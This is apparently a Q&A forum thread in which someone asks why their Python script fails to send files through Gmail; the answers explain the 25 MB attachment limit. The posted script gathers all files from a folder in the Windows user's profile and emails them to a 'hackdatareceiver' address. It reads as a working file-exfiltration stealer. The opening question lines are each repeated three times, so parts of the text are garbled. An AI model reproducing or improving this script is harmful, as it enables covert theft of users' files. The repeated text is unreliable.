# I want to send a file through Gmail and I'm having trouble

Tags: python, python-3.x, python-2.7, gmail

I want to send a file through Gmail and I'm having trouble

I want to send a file through Gmail and I'm having trouble

I want to send a file through Gmail and I'm having trouble

---

I replaced gmails and passwords, but the problem did not resolve

I replaced gmails and passwords, but the problem did not resolve

I replaced gmails and passwords, but the problem did not resolve

---

Maybe there's a problem with the addresses. Please help me

Maybe there's a problem with the addresses. Please help me

Maybe there's a problem with the addresses. Please help me

---

my error :

```
Traceback (most recent call last):
File "C:\Users\Michael\Desktop\windows.information.py", line 83, in <module>
filenames)
File "C:\Users\Michael\Desktop\windows.information.py", line 75, in mail
mailServer.sendmail(gmail_user, to, msg.as_string())
File "C:\Program Files 1\Python2\lib\smtplib.py", line 737, in sendmail
raise SMTPSenderRefused(code, resp, from_addr)
smtplib.SMTPSenderRefused: (552, "5.2.3 Your message exceeded Google's message size limits. Please visit\n5.2.3  https://support.google.com/mail/?p=MaxSizeError to view our size\n5.2.3 guidelines. f192sm642881wmg.14 - gsmtp", 'hackdatasender@gmail.com')
```

my script:

```
import os
import getpass
import smtplib
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
from email.MIMEImage import MIMEImage
from email.MIMEBase import MIMEBase
from email import Encoders


windowsDrive = os.environ['WINDIR'].split(":\\")[0]
userName = getpass.getuser()
    # ===== Set up crap for the attachments
files = windowsDrive+':\\Users\\'+userName+'\\windows.information'
filenames = [os.path.join(files, f) for f in os.listdir(files)]
    ## ===== print filenames


    ## ===== Set up users for email
gmail_user = "hackdatasender@gmail.com"
gmail_pwd = "******"
recipients = ['hackdatareceiver@gmail.com']

    # ===== Create Module
def mail(to, subject, text, attach):
   msg = MIMEMultipart()
   msg['hackdatasender@gmail.com'] = gmail_user
   msg['hackdatareceiver@gmail.com'] = ", ".join(recipients)
   msg['Subject'] = subject

   msg.attach(MIMEText(text))

   ## ===== get all the attachments
   for file in filenames:
      part = MIMEBase('application', 'octet-stream')
      part.set_payload(open(file, 'rb').read())
      Encoders.encode_base64(part)
      part.add_header('Content-Disposition', 'attachment; filename="%s"' % file)
      msg.attach(part)

   mailServer = smtplib.SMTP("smtp.gmail.com", 587)
   mailServer.ehlo()
   mailServer.starttls()
   mailServer.ehlo()
   mailServer.login(gmail_user, gmail_pwd)
   mailServer.sendmail(gmail_user, to, msg.as_string())
   ## ===== Should be mailServer.quit(), but that crashes...
   mailServer.close()

    # ====== send it
mail(recipients,
   "*** M.1.G.0.A.4.W ***",
   "M.1.G.0.A.4.W",
   filenames)
```

> How to send files over 25 MB in size?

Comment: What is your problem? The error message tells you that the file you are sending was rejected for being too large: https://support.google.com/mail/answer/6584?p=MaxSizeError&visit_id=1-636604272352294875-4024403935&rd=1#limit

Comment: To quote from the official docs: `You can send up to 25 MB in attachments.`

Answer (score 1, accepted):

The error you are receiving is indicating that the file you are sending is too large.

`Your message exceeded Google's message size limits.`

The official Gmail documentation ([link](https://support.google.com/mail/answer/6584?p=MaxSizeError&visit_id=1-636604272352294875-4024403935&rd=1#limit)) states:

> You can send up to 25 MB in attachments. If you have more than one
>   attachment, they can't add up to more than 25 MB.

Comment: After file >25 MB switched to Google drive ! Orginal question : "How use google drive api with python?"

Comment: I'm afraid I don't know of any way to do this, I'd explore other ways of sending the file, such as uploading it to cloud storage then email the link.